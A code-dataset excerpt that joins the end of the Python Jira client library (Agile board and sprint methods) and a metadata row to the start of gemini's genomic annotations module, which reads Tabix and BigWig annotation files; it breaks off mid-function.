self._session.post(url, data=payload)
return True
def add_user_to_group(self, username, group):
'''
Adds a user to an existing group.
:param username: Username that will be added to specified group.
:param group: Group that the user will be added to.
:return: Boolean, True for success, False for failure.
'''
url = self._options['server'] + '/rest/api/latest/group/user'
x = {'groupname': group}
y = {'name': username}
payload = json.dumps(y)
self._session.post(url, params=x, data=payload)
return True
def remove_user_from_group(self, username, groupname):
'''
Removes a user from a group.
:param username: The user to remove from the group.
:param groupname: The group that the user will be removed from.
:return: Boolean, True for success.
'''
url = self._options['server'] + '/rest/api/latest/group/user'
x = {'groupname': groupname,
'username': username}
self._session.delete(url, params=x)
return True
# Experimental
# Experimental support for iDalko Grid, expect API to change as it's using private APIs currently
# https://support.idalko.com/browse/IGRID-1017
def get_igrid(self, issueid, customfield, schemeid):
url = self._options['server'] + '/rest/idalko-igrid/1.0/datagrid/data'
if str(customfield).isdigit():
customfield = "customfield_%s" % customfield
params = {
#'_mode':'view',
'_issueId': issueid,
'_fieldId': customfield,
'_confSchemeId': schemeid,
#'validate':True,
#'_search':False,
#'rows':100,
#'page':1,
#'sidx':'DEFAULT',
#'sord':'asc',
}
r = self._session.get(
url, headers=self._options['headers'], params=params)
return json_loads(r)
# Jira Agile specific methods (GreenHopper)
"""
Define the functions that interact with GreenHopper.
"""
@translate_resource_args
def boards(self):
"""
Get a list of board GreenHopperResources.
"""
r_json = self._get_json(
'rapidviews/list', base=self.AGILE_BASE_URL)
boards = [Board(self._options, self._session, raw_boards_json)
for raw_boards_json in r_json['views']]
return boards
@translate_resource_args
def sprints(self, id, extended=False):
"""
Get a list of sprint GreenHopperResources.
:param id: the board to get sprints from
:param extended: fetch additional information like startDate, endDate, completeDate,
much slower because it requires an additional request for each sprint
:rtype: dict
>>> { "id": 893,
>>> "name": "iteration.5",
>>> "state": "FUTURE",
>>> "linkedPagesCount": 0,
>>> "startDate": "None",
>>> "endDate": "None",
>>> "completeDate": "None",
>>> "remoteLinks": []
>>> }
"""
r_json = self._get_json('sprintquery/%s?includeHistoricSprints=true&includeFutureSprints=true' % id,
base=self.AGILE_BASE_URL)
if extended:
sprints = []
for raw_sprints_json in r_json['sprints']:
r_json = self._get_json(
'sprint/%s/edit/model' % raw_sprints_json['id'], base=self.AGILE_BASE_URL)
sprints.append(
Sprint(self._options, self._session, r_json['sprint']))
else:
sprints = [Sprint(self._options, self._session, raw_sprints_json)
for raw_sprints_json in r_json['sprints']]
return sprints
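# Illustrative sketch (not part of the library): assuming an authenticated
# client ``jira`` and a hypothetical board id ``42``:
#
#   for sprint in jira.sprints(42, extended=True):
#       print(sprint.name, sprint.raw.get('startDate'))
#
# ``extended=True`` issues one extra request per sprint, so it is noticeably
# slower on boards with many sprints.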
def sprints_by_name(self, id, extended=False):
sprints = {}
for s in self.sprints(id, extended=extended):
if s.name not in sprints:
sprints[s.name] = s.raw
else:
raise (Exception(
"Fatal error, duplicate Sprint Name (%s) found on board %s." % (s.name, id)))
return sprints
def update_sprint(self, id, name=None, startDate=None, endDate=None):
payload = {}
if name:
payload['name'] = name
if startDate:
payload['startDate'] = startDate
if endDate:
payload['endDate'] = endDate
# if state:
# payload['state']=state
url = self._get_url('sprint/%s' % id, base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(payload))
return json_loads(r)
def completed_issues(self, board_id, sprint_id):
"""
Return the completed issues for ``board_id`` and ``sprint_id``.
:param board_id: the board to retrieve issues from
:param sprint_id: the sprint to retrieve issues from
"""
# TODO need a better way to provide all the info from the sprintreport
# incompletedIssues went to the backlog but were not completed
# issueKeysAddedDuringSprint used to mark some with a * ?
# puntedIssues are for scope change?
r_json = self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)
issues = [Issue(self._options, self._session, raw_issues_json) for raw_issues_json in
r_json['contents']['completedIssues']]
return issues
def completedIssuesEstimateSum(self, board_id, sprint_id):
"""
Return the total completed points this sprint.
"""
return self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)['contents']['completedIssuesEstimateSum']['value']
def incompleted_issues(self, board_id, sprint_id):
"""
Return the incomplete issues for ``board_id`` and ``sprint_id``.
"""
r_json = self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)
issues = [Issue(self._options, self._session, raw_issues_json) for raw_issues_json in
r_json['contents']['incompletedIssues']]
return issues
def sprint_info(self, board_id, sprint_id):
"""
Return the information about a sprint.
:param board_id: the board to retrieve issues from
:param sprint_id: the sprint to retrieve issues from
"""
return self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)['sprint']
# TODO: remove this as we do have Board.delete()
def delete_board(self, id):
"""
Deletes an agile board.
:param id: ID of the board to delete
:return:
"""
payload = {}
url = self._get_url(
'rapidview/%s' % id, base=self.AGILE_BASE_URL)
r = self._session.delete(
url, data=json.dumps(payload))
def create_board(self, name, project_ids, preset="scrum"):
"""
Create a new board for the ``project_ids``.
:param name: name of the board
:param project_ids: the projects to create the board in
:param preset: what preset to use for this board
:type preset: 'kanban', 'scrum', 'diy'
"""
payload = {}
if isinstance(project_ids, string_types):
ids = []
for p in project_ids.split(','):
ids.append(self.project(p).id)
project_ids = ','.join(ids)
payload['name'] = name
if isinstance(project_ids, string_types):
project_ids = project_ids.split(',')
payload['projectIds'] = project_ids
payload['preset'] = preset
url = self._get_url(
'rapidview/create/presets', base=self.AGILE_BASE_URL)
r = self._session.post(
url, data=json.dumps(payload))
raw_issue_json = json_loads(r)
return Board(self._options, self._session, raw=raw_issue_json)
def create_sprint(self, name, board_id, startDate=None, endDate=None):
"""
Create a new sprint for the ``board_id``.
:param name: name of the sprint
:param board_id: the board to add the sprint to
"""
url = self._get_url(
'sprint/%s' % board_id, base=self.AGILE_BASE_URL)
r = self._session.post(
url)
raw_issue_json = json_loads(r)
""" now r contains something like:
{
"id": 742,
"name": "Sprint 89",
"state": "FUTURE",
"linkedPagesCount": 0,
"startDate": "None",
"endDate": "None",
"completeDate": "None",
"remoteLinks": []
}"""
payload = {'name': name}
if startDate:
payload["startDate"] = startDate
if endDate:
payload["endDate"] = endDate
url = self._get_url(
'sprint/%s' % raw_issue_json['id'], base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(payload))
raw_issue_json = json_loads(r)
return Sprint(self._options, self._session, raw=raw_issue_json)
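# Illustrative sketch (not part of the library): assuming an authenticated
# client ``jira`` and a hypothetical board id ``42``, a named sprint with
# explicit dates could be created like this:
#
#   sprint = jira.create_sprint('iteration.6', 42,
#                               startDate='2014-06-02', endDate='2014-06-13')
#   print(sprint.id, sprint.state)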
# TODO: broken, this API does not exist anymore and we need to use
# issue.update() to perform this operation
def add_issues_to_sprint(self, sprint_id, issue_keys):
"""
Add the issues in ``issue_keys`` to the ``sprint_id``. The sprint must
be started but not completed.
If a sprint was completed, you then also have to edit the history of the
issue so that it was added to the sprint before it was completed,
preferably before it started. A completed sprint's issues also all have
a resolution set before the completion date.
If a sprint was not started, then you have to edit the marker and copy the
rank of each issue too.
:param sprint_id: the sprint to add issues to
:param issue_keys: the issues to add to the sprint
"""
data = {}
data['issueKeys'] = issue_keys
url = self._get_url('sprint/%s/issues/add' %
(sprint_id), base=self.AGILE_BASE_URL)
r = self._session.put(url, data=json.dumps(data))
def add_issues_to_epic(self, epic_id, issue_keys, ignore_epics=True):
"""
Add the issues in ``issue_keys`` to the ``epic_id``.
:param epic_id: the epic to add issues to
:param issue_keys: the issues to add to the epic
:param ignore_epics: ignore any issues listed in ``issue_keys`` that are epics
"""
data = {}
data['issueKeys'] = issue_keys
data['ignoreEpics'] = ignore_epics
url = self._get_url('epics/%s/add' %
epic_id, base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(data))
def rank(self, issue, next_issue):
"""
Rank an issue before another using the default Ranking field, the one named 'Rank'.
:param issue: issue key of the issue to be ranked before the second one.
:param next_issue: issue key of the second issue.
"""
# {"issueKeys":["ANERDS-102"],"rankBeforeKey":"ANERDS-94","rankAfterKey":"ANERDS-7","customFieldId":11431}
if not self._rank:
for field in self.fields():
if field['name'] == 'Rank' and field['schema']['custom'] == "com.pyxis.greenhopper.jira:gh-global-rank":
self._rank = field['schema']['customId']
data = {
"issueKeys": [issue], "rankBeforeKey": next_issue, "customFieldId": self._rank}
url = self._get_url('rank', base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(data))
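# Illustrative sketch (not part of the library): assuming an authenticated
# client ``jira`` and two hypothetical issue keys, ranking one issue above
# the other on the default 'Rank' field is a single call:
#
#   jira.rank('DEMO-102', 'DEMO-94')   # DEMO-102 is placed before DEMO-94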
class GreenHopper(JIRA):
def __init__(self, options=None, basic_auth=None, oauth=None, async=None):
warnings.warn(
"GreenHopper() class is deprecated, just use JIRA() instead.", DeprecationWarning)
self._rank = None
JIRA.__init__(
self, options=options, basic_auth=basic_auth, oauth=oauth, async=async)
|
bsd-2-clause
| 4,014,760,144,798,227,500
| 38.09324
| 203
| 0.59418
| false
| 4.251024
| false
| false
| false
|
poojavade/Genomics_Docker
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/gemini-0.10.0-py2.7.egg/gemini/annotations.py
|
1
|
30633
|
#!/usr/bin/env python
import pysam
import sqlite3
import os
import sys
import collections
import re
from unidecode import unidecode
from bx.bbi.bigwig_file import BigWigFile
from gemini.config import read_gemini_config
# dictionary of anno_type -> open Tabix file handles
annos = {}
def get_anno_files( args ):
config = read_gemini_config( args = args )
anno_dirname = config["annotation_dir"]
# Default annotations -- always found
annos = {
'pfam_domain': os.path.join(anno_dirname, 'hg19.pfam.ucscgenes.bed.gz'),
'cytoband': os.path.join(anno_dirname, 'hg19.cytoband.bed.gz'),
'dbsnp': os.path.join(anno_dirname, 'dbsnp.138.vcf.gz'),
'clinvar': os.path.join(anno_dirname, 'clinvar_20140303.vcf.gz'),
'gwas': os.path.join(anno_dirname, 'hg19.gwas.bed.gz'),
'rmsk': os.path.join(anno_dirname, 'hg19.rmsk.bed.gz'),
'segdup': os.path.join(anno_dirname, 'hg19.segdup.bed.gz'),
'conserved': os.path.join(anno_dirname, '29way_pi_lods_elements_12mers.chr_specific.fdr_0.1_with_scores.txt.hg19.merged.bed.gz'),
'cpg_island': os.path.join(anno_dirname, 'hg19.CpG.bed.gz'),
'dgv': os.path.join(anno_dirname, 'hg19.dgv.bed.gz'),
'esp': os.path.join(anno_dirname,
'ESP6500SI.all.snps_indels.vcf.gz'),
'1000g': os.path.join(anno_dirname,
'ALL.wgs.integrated_phase1_v3.20101123.snps_indels_sv.sites.2012Oct12.vcf.gz'),
'recomb': os.path.join(anno_dirname,
'genetic_map_HapMapII_GRCh37.gz'),
'gms': os.path.join(anno_dirname,
'GRCh37-gms-mappability.vcf.gz'),
'grc': os.path.join(anno_dirname, 'GRC_patch_regions.bed.gz'),
'cse': os.path.join(anno_dirname, "cse-hiseq-8_4-2013-02-20.bed.gz"),
'encode_tfbs': os.path.join(anno_dirname,
'wgEncodeRegTfbsClusteredV2.cell_count.20130213.bed.gz'),
'encode_dnase1': os.path.join(anno_dirname,
'stam.125cells.dnaseI.hg19.bed.gz'),
'encode_consensus_segs': os.path.join(anno_dirname,
'encode.6celltypes.consensus.bedg.gz'),
'gerp_elements': os.path.join(anno_dirname, 'hg19.gerp.elements.bed.gz'),
'vista_enhancers': os.path.join(anno_dirname, 'hg19.vista.enhancers.20131108.bed.gz'),
'cosmic': os.path.join(anno_dirname, 'hg19.cosmic.v67.20131024.gz')
}
# optional annotations
if os.path.exists(os.path.join(anno_dirname, 'hg19.gerp.bw')):
annos['gerp_bp'] = os.path.join(anno_dirname, 'hg19.gerp.bw')
if os.path.exists(os.path.join(anno_dirname, 'whole_genome_SNVs.tsv.compressed.gz')):
annos['cadd_score'] = os.path.join(anno_dirname, 'whole_genome_SNVs.tsv.compressed.gz')
return annos
class ClinVarInfo(object):
def __init__(self):
self.clinvar_dbsource = None
self.clinvar_dbsource_id = None
self.clinvar_origin = None
self.clinvar_sig = None
self.clinvar_dsdb = None
self.clinvar_dsdbid = None
self.clinvar_disease_name = None
self.clinvar_disease_acc = None
self.clinvar_in_omim = None
self.clinvar_in_locus_spec_db = None
self.clinvar_on_diag_assay = None
self.origin_code_map = {'0': 'unknown',
'1': 'germline',
'2': 'somatic',
'4': 'inherited',
'8': 'paternal',
'16': 'maternal',
'32': 'de-novo',
'64': 'biparental',
'128': 'uniparental',
'256': 'not-tested',
'512': 'tested-inconclusive',
'1073741824': 'other'}
self.sig_code_map = {'0': 'unknown',
'1': 'untested',
'2': 'non-pathogenic',
'3': 'probable-non-pathogenic',
'4': 'probable-pathogenic',
'5': 'pathogenic',
'6': 'drug-response',
'7': 'histocompatibility',
'255': 'other'}
def __repr__(self):
return '\t'.join([self.clinvar_dbsource,
self.clinvar_dbsource_id,
self.clinvar_origin,
self.clinvar_sig,
self.clinvar_dsdb,
self.clinvar_dsdbid,
self.clinvar_disease_name,
self.clinvar_disease_acc,
str(self.clinvar_in_omim),
str(self.clinvar_in_locus_spec_db),
str(self.clinvar_on_diag_assay)])
def lookup_clinvar_origin(self, origin_code):
try:
return self.origin_code_map[origin_code]
except KeyError:
return None
def lookup_clinvar_significance(self, sig_code):
if "|" not in sig_code:
try:
return self.sig_code_map[sig_code]
except KeyError:
return None
else:
sigs = set(sig_code.split('|'))
# e.g., 255|255|255
if len(sigs) == 1:
try:
return self.sig_code_map[sigs.pop()]
except KeyError:
return None
# e.g., 1|5|255
else:
return "mixed"
ESPInfo = collections.namedtuple("ESPInfo",
"found \
aaf_EA \
aaf_AA \
aaf_ALL \
exome_chip")
ENCODEDnaseIClusters = collections.namedtuple("ENCODEDnaseIClusters",
"cell_count \
cell_list")
ENCODESegInfo = collections.namedtuple("ENCODESegInfo",
"gm12878 \
h1hesc \
helas3 \
hepg2 \
huvec \
k562")
ThousandGInfo = collections.namedtuple("ThousandGInfo",
"found \
aaf_ALL \
aaf_AMR \
aaf_ASN \
aaf_AFR \
aaf_EUR")
def load_annos( args ):
"""
Populate a dictionary of Tabixfile handles for
each annotation file. Other modules can then
access a given handle and fetch data from it
as follows:
dbsnp_handle = annotations.annos['dbsnp']
hits = dbsnp_handle.fetch(chrom, start, end)
"""
anno_files = get_anno_files( args )
for anno in anno_files:
try:
# .gz denotes Tabix files.
if anno_files[anno].endswith(".gz"):
annos[anno] = pysam.Tabixfile(anno_files[anno])
# .bw denotes BigWig files.
elif anno_files[anno].endswith(".bw"):
annos[anno] = BigWigFile( open( anno_files[anno] ) )
except IOError:
sys.exit("Gemini cannot open this annotation file: %s. \n"
"Have you installed the annotation files? If so, "
"have they been moved or deleted? Exiting...\n\n"
"For more details:\n\t"
"http://gemini.readthedocs.org/en/latest/content/"
"#installation.html\#installing-annotation-files\n"
% anno_files[anno])
# ## Standard access to Tabix indexed files
def _get_hits(coords, annotation, parser_type):
"""Retrieve BED information, recovering if BED annotation file does have a chromosome.
"""
if parser_type == "bed":
parser = pysam.asBed()
elif parser_type == "vcf":
parser = pysam.asVCF()
elif parser_type == "tuple":
parser = pysam.asTuple()
elif parser_type is None:
parser = None
else:
raise ValueError("Unexpected parser type: %s" % parser)
chrom, start, end = coords
try:
hit_iter = annotation.fetch(str(chrom), start, end, parser=parser)
# catch invalid region errors raised by ctabix
except ValueError:
hit_iter = []
# recent versions of pysam return KeyError
except KeyError:
hit_iter = []
return hit_iter
def _get_bw_summary(coords, annotation):
"""Return summary of BigWig scores in an interval
"""
chrom, start, end = coords
try:
return annotation.summarize(str(chrom), start, end, end-start).min_val[0]
except AttributeError:
return None
def _get_chr_as_grch37(chrom):
if chrom in ["chrM"]:
return "MT"
return chrom if not chrom.startswith("chr") else chrom[3:]
def _get_chr_as_ucsc(chrom):
return chrom if chrom.startswith("chr") else "chr" + chrom
def guess_contig_naming(anno):
"""Guess which contig naming scheme a given annotation file uses.
"""
chr_names = [x for x in anno.contigs if x.startswith("chr")]
if len(chr_names) > 0:
return "ucsc"
else:
return "grch37"
def _get_var_coords(var, naming):
"""Retrieve variant coordinates from multiple input objects.
"""
if isinstance(var, dict) or isinstance(var, sqlite3.Row):
chrom = var["chrom"]
start = int(var["start"])
end = int(var["end"])
else:
chrom = var.CHROM
start = var.start
end = var.end
if naming == "ucsc":
chrom = _get_chr_as_ucsc(chrom)
elif naming == "grch37":
chrom = _get_chr_as_grch37(chrom)
return chrom, start, end
def _get_cadd_scores(var, labels, hit):
"""
get cadd scores
"""
raw = hit[3].split(",")
scaled = hit[4].split(",")
p = re.compile(str(var.ALT[0]))
for m in p.finditer(str(labels[hit[2]])):
pos = m.start()
return raw[pos], scaled[pos]
def annotations_in_region(var, anno, parser_type=None, naming="ucsc"):
"""Iterator of annotations found in a genomic region.
- var: PyVCF object or database query with chromosome, start and end.
- anno: pysam Tabix annotation file or string to reference
a standard annotation
- parser_type: string specifying the filetype of the tabix file
- naming: chromosome naming scheme used, ucsc or grch37
"""
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
return _get_hits(coords, anno, parser_type)
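# Illustrative sketch (not part of the module): assuming the annotation
# handles have been opened with ``load_annos(args)`` and ``var`` is a PyVCF
# record, overlapping dbSNP entries could be iterated like this:
#
#   for hit in annotations_in_region(var, "dbsnp", parser_type="vcf",
#                                    naming="grch37"):
#       print(hit.id)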
def bigwig_summary(var, anno, naming="ucsc"):
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
return _get_bw_summary(coords, anno)
# ## Track-specific annotations
def get_cpg_island_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a CpG island
"""
for hit in annotations_in_region(var, "cpg_island", "bed"):
return True
return False
# def get_dbNSFP_info(var, impacts):
# """
# Returns Polyphen, SIFT, etc. from dbNSFP annotation file.
# One prediction per transcript.
# LIMITATION: only handles bi-allelic loci
# """
# # is this variant predicted to be nonsynonymous for any of the transcripts?
# # if not, we can skip dnNSFP.
# non_syn_impacts = [imp for imp in impacts \
# if imp.consequence == 'non_syn_coding']
# if len(non_syn_impacts) > 0:
# for hit in annotations_in_region(var, "dbnsfp", parser_type="tuple", naming="grch37"):
# if var.POS == int(hit[1]) and \
# var.REF == hit[2] and \
# var.ALT[0] == hit[3]:
# transcripts = hit[7].split(';')
# aapos = hit[8].split(';')
# pp_scores = hit[11].split(';')
# if len(transcripts) != len(pp_scores):
# print var.POS, var.REF, var.ALT[0], [i.transcript for i in non_syn_impacts], \
# [i.polyphen_pred for i in non_syn_impacts], [i.polyphen_score for i in non_syn_impacts], \
# hit[7], hit[8], hit[11], hit[12]
# else:
# pass
def get_cyto_info(var):
"""
Returns a comma-separated list of the chromosomal
cytobands that a variant overlaps.
"""
cyto_band = ''
for hit in annotations_in_region(var, "cytoband", "bed"):
if len(cyto_band) > 0:
cyto_band += "," + hit.contig + hit.name
else:
cyto_band += hit.contig + hit.name
return cyto_band if len(cyto_band) > 0 else None
def get_gerp_bp(var):
"""
Returns a summary of the GERP scores for the variant.
"""
if "gerp_bp" not in annos:
raise IOError("Need to download BigWig file with GERP scores per base pair. "
"Run `gemini update --dataonly --extra gerp_bp")
gerp = bigwig_summary(var, "gerp_bp")
return gerp
def get_gerp_elements(var):
"""
Returns the GERP element information.
"""
p_vals = []
for hit in annotations_in_region(var, "gerp_elements", "tuple"):
p_vals.append(hit[3])
if len(p_vals) == 1:
return p_vals[0]
elif len(p_vals) > 1:
return min(float(p) for p in p_vals)
else:
return None
def get_vista_enhancers(var):
"""
Returns the VISTA enhancer information.
"""
vista_enhancers = []
for hit in annotations_in_region(var, "vista_enhancers", "tuple"):
vista_enhancers.append(hit[4])
return ",".join(vista_enhancers) if len(vista_enhancers) > 0 else None
def get_cadd_scores(var):
"""
Returns the raw and scaled CADD scores used to predict deleterious
variants. Implemented only for SNVs.
"""
if "cadd_score" not in annos:
raise IOError("Need to download the CADD data file for deleteriousness."
"Run `gemini update --dataonly --extra cadd_score")
cadd_raw = cadd_scaled = None
labels = {"A":"CGT", "C":"AGT", "G":"ACT", "T":"ACG", "R":"ACGT", "M":"ACGT"}
for hit in annotations_in_region(var, "cadd_score", "tuple", "grch37"):
# we want exact position mapping here and not a range (end-start) as
# returned in hit (e.g. indels) & we do not want to consider del & ins
if str(hit[1]) == str(var.POS) and len(var.REF) == 1 and \
len(var.ALT[0]) == 1:
if str(hit[2]) == var.REF and str(var.ALT[0]) in labels[hit[2]]:
(cadd_raw, cadd_scaled) = _get_cadd_scores(var, labels, hit)
# consider ref cases with ambiguity codes R (G,A) and M (A,C)
elif ((str(hit[2]) == 'R' and var.REF in('G','A')) or \
(str(hit[2]) == 'M' and var.REF in('A','C'))) and \
str(var.ALT[0]) in labels[hit[2]]:
(cadd_raw, cadd_scaled) = _get_cadd_scores(var, labels, hit)
return (cadd_raw, cadd_scaled)
def get_pfamA_domains(var):
"""
Returns pfamA domains that a variant overlaps
"""
pfam_domain = []
for hit in annotations_in_region(var, "pfam_domain", "bed"):
pfam_domain.append(hit.name)
return ",".join(pfam_domain) if len(pfam_domain) > 0 else None
def get_cosmic_info(var):
"""
Returns a list of COSMIC ids associated with given variant
E.g. from COSMIC VCF
#CHROM POS ID REF ALT QUAL FILTER INFO
chrM 1747 COSN408408 G A . . .
chrM 2700 COSN408409 G A . . .
chr1 42880262 COSM464635 G C . . AA=p.D224H;CDS=c.670G>C;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880269 COSM909628 G A . . AA=p.G226D;CDS=c.677G>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880284 COSM1502979 G T . . AA=p.C231F;CDS=c.692G>T;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880318 COSM681351 T A . . AA=p.F242L;CDS=c.726T>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880337 COSM464636 G A . . AA=p.D249N;CDS=c.745G>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880384 COSM909629 T C . . AA=p.N264N;CDS=c.792T>C;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880415 COSM909630 G C . . AA=p.G275R;CDS=c.823G>C;CNT=1;GENE=RIMKLA;STRAND=+
"""
# collect the ids of overlapping COSMIC variants (most often, just one).
cosmic_ids = []
for hit in annotations_in_region(var, "cosmic", "vcf", "ucsc"):
cosmic_ids.append(hit.id)
return ",".join(cosmic_ids) if len(cosmic_ids) > 0 else None
def get_clinvar_info(var):
"""
Returns a suite of annotations from ClinVar
ClinVarInfo named_tuple:
--------------------------------------------------------------------------
# clinvar_dbsource = CLNSRC=OMIM Allelic Variant;
# clinvar_dbsource_id = CLNSRCID=103320.0001;
# clinvar_origin = CLNORIGIN=1
# clinvar_sig = CLNSIG=5
# clinvar_dsdb = CLNDSDB=GeneReviews:NCBI:OMIM:Orphanet;
# clinvar_dsdbid = CLNDSDBID=NBK1168:C1850792:254300:590;
# clinvar_disease_name = CLNDBN=Myasthenia\x2c limb-girdle\x2c familial;
# clinvar_disease_acc = CLNACC=RCV000019902.1
# clinvar_in_omim = OM
# clinvar_in_locus_spec_db = LSD
# clinvar_on_diag_assay = CDA
"""
clinvar = ClinVarInfo()
# report the first overlapping ClinVar variant (most often, just one).
for hit in annotations_in_region(var, "clinvar", "vcf", "grch37"):
# load each VCF INFO key/value pair into a DICT
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=")
info_map[key] = value
else:
info_map[info] = True
raw_dbsource = info_map['CLNSRC'] or None
#interpret 8-bit strings and convert to plain text
clinvar.clinvar_dbsource = unidecode(raw_dbsource.decode('utf-8'))
clinvar.clinvar_dbsource_id = info_map['CLNSRCID'] or None
clinvar.clinvar_origin = \
clinvar.lookup_clinvar_origin(info_map['CLNORIGIN'])
clinvar.clinvar_sig = \
clinvar.lookup_clinvar_significance(info_map['CLNSIG'])
clinvar.clinvar_dsdb = info_map['CLNDSDB'] or None
clinvar.clinvar_dsdbid = info_map['CLNDSDBID'] or None
# Remap all unicode characters into plain text string replacements
raw_disease_name = info_map['CLNDBN'] or None
clinvar.clinvar_disease_name = unidecode(raw_disease_name.decode('utf-8'))
# Clinvar represents commas as \x2c. Make them commas.
clinvar.clinvar_disease_name = clinvar.clinvar_disease_name.decode('string_escape')
clinvar.clinvar_disease_acc = info_map['CLNACC'] or None
clinvar.clinvar_in_omim = 1 if 'OM' in info_map else 0
clinvar.clinvar_in_locus_spec_db = 1 if 'LSD' in info_map else 0
clinvar.clinvar_on_diag_assay = 1 if 'CDA' in info_map else 0
return clinvar
def get_dbsnp_info(var):
"""
Returns a suite of annotations from dbSNP
"""
rs_ids = []
for hit in annotations_in_region(var, "dbsnp", "vcf", "grch37"):
rs_ids.append(hit.id)
# load each VCF INFO key/value pair into a DICT
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=")
info_map[key] = value
return ",".join(rs_ids) if len(rs_ids) > 0 else None
def get_esp_info(var):
"""
Returns a suite of annotations from the ESP project
ESP reports the minor allele frequency (MAF), not the
alternate allele frequency (AAF). We must therefore figure
out whether the reference or alternate allele is the minor allele.
1 69496 rs150690004 G A . PASS DBSNP=dbSNP_134;EA_AC=2,6764;AA_AC=23,3785;TAC=25,10549;MAF=0.0296,0.604,0.2364;GTS=AA,AG,GG;EA_GTC=0,2,3381;AA_GTC=5,13,1886;GTC=5,15,5267;DP=91;GL=OR4F5;CP=0.5;CG=2.3;AA=G;CA=.;EXOME_CHIP=no;GWAS_PUBMED=.;GM=NM_001005484.1;FG=missense;AAC=SER/GLY;PP=136/306;CDP=406;GS=56;PH=benign
1 69511 rs75062661 A G . PASS DBSNP=dbSNP_131;EA_AC=5337,677;AA_AC=1937,1623;TAC=7274,2300;MAF=11.2571,45.5899,24.0234;GTS=GG,GA,AA;EA_GTC=2430,477,100;AA_GTC=784,369,627;GTC=3214,846,727;DP=69;GL=OR4F5;CP=1.0;CG=1.1;AA=G;CA=.;EXOME_CHIP=no;GWAS_PUBMED=.;GM=NM_001005484.1;FG=missense;AAC=ALA/THR;PP=141/306;CDP=421;GS=58;PH=benign
"""
aaf_EA = aaf_AA = aaf_ALL = None
maf = fetched = con = []
exome_chip = False
found = False
info_map = {}
for hit in annotations_in_region(var, "esp", "vcf", "grch37"):
if hit.contig not in ['Y']:
fetched.append(hit)
# We need a single ESP entry for a variant
if fetched != None and len(fetched) == 1 and \
hit.alt == var.ALT[0] and hit.ref == var.REF:
found = True
# loads each VCF INFO key/value pair into a DICT
for info in hit.info.split(";"):
if info.find("=") > 0:
# split on the first occurrence of '='
# useful to avoid ValueError: too many values to unpack, for INFO values that themselves contain '=', e.g.
# SA=http://www.ncbi.nlm.nih.gov/sites/varvu?gene=4524&%3Brs=1801131|http://omim.org/entry/607093#0004
(key, value) = info.split("=", 1)
info_map[key] = value
# get the allele counts so that we can compute alternate allele frequencies
# example: EA_AC=2,6764;AA_AC=23,3785;TAC=25,10549
if info_map.get('EA_AC') is not None:
lines = info_map['EA_AC'].split(",")
aaf_EA = float(lines[0]) / (float(lines[0]) + float(lines[1]))
if info_map.get('AA_AC') is not None:
lines = info_map['AA_AC'].split(",")
aaf_AA = float(lines[0]) / (float(lines[0]) + float(lines[1]))
if info_map.get('TAC') is not None:
lines = info_map['TAC'].split(",")
aaf_ALL = float(lines[0]) / (float(lines[0]) + float(lines[1]))
# Is the SNP on a human exome chip?
if info_map.get('EXOME_CHIP') is not None and \
info_map['EXOME_CHIP'] == "no":
exome_chip = 0
elif info_map.get('EXOME_CHIP') is not None and \
info_map['EXOME_CHIP'] == "yes":
exome_chip = 1
return ESPInfo(found, aaf_EA, aaf_AA, aaf_ALL, exome_chip)
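# Worked example (illustrative, not part of the module): for an ESP record
# with EA_AC=2,6764 the alternate allele frequency computed above would be
# 2 / (2 + 6764) ~= 0.000296, i.e. the first count is treated as the
# alternate allele count and the second as the reference allele count.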
def get_1000G_info(var):
"""
Returns a suite of annotations from the 1000 Genomes project
"""
#fetched = []
info_map = {}
found = False
for hit in annotations_in_region(var, "1000g", "vcf", "grch37"):
# We need to ensure we are dealing with the exact sample variant
# based on position and the alleles present.
if var.start == hit.pos and \
var.ALT[0] == hit.alt and \
hit.ref == var.REF:
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=", 1)
info_map[key] = value
found = True
return ThousandGInfo(found, info_map.get('AF'), info_map.get('AMR_AF'),
info_map.get('ASN_AF'), info_map.get('AFR_AF'),
info_map.get('EUR_AF'))
def get_rmsk_info(var):
"""
Returns a comma-separated list of annotated repeats
that overlap a variant. Derived from the UCSC rmsk track
"""
rmsk_hits = []
for hit in annotations_in_region(var, "rmsk", "bed"):
rmsk_hits.append(hit.name)
return ",".join(rmsk_hits) if len(rmsk_hits) > 0 else None
def get_segdup_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a known segmental duplication.
"""
for hit in annotations_in_region(var, "segdup", "bed"):
return True
return False
def get_conservation_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a conserved region as defined
by the 29-way mammalian conservation study.
http://www.nature.com/nature/journal/v478/n7370/full/nature10530.html
Data file provenance:
http://www.broadinstitute.org/ftp/pub/assemblies/mammals/29mammals/ \
29way_pi_lods_elements_12mers.chr_specific.fdr_0.1_with_scores.txt.gz
# Script to convert for gemini:
gemini/annotation_provenance/make-29way-conservation.sh
"""
for hit in annotations_in_region(var, "conserved", "bed"):
return True
return False
def get_recomb_info(var):
"""
Returns the mean recombination rate at the site.
"""
count = 0
tot_rate = 0.0
